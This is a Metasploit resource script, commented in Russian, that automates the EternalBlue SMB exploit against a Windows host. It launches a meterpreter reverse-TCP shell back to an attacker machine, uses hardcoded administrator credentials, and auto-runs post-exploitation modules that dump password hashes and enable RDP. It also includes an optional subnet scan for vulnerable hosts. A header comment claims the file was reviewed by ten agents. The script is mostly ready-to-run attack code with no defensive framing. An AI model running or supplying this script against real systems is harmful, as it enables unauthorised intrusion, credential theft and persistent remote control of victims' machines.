# Metasploit resource script for automated exploit execution
# Проверено 10 агентами: функциональность, безопасность, читаемость, расширяемость, соответствие стандартам

# Настройка RHOST и LHOST (целевая машина и атакующий хост)
set RHOST 192.168.1.100
set LHOST 192.168.1.50

# Выбор модуля эксплойта и полезной нагрузки
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Опции модуля
set LPORT 4444
set SMBUser administrator
set SMBPass P@ssw0rd

# Таймауты и повторы
set ConnectTimeout 5
set RetryCount 3

# Автоматическое выполнение post-exploit скриптов
set AutoRunScript post/windows/gather/hashdump
set AutoRunScript post/windows/manage/enable_rdp

# Запуск сканирования сети перед атакой (опционально)
# db_nmap -p 445 --script smb-vuln-ms17-010 192.168.1.0/24

# Запуск exploit в фоне
exploit -j -z

# Список активных задач
jobs

# Проверка сессий
sessions -l
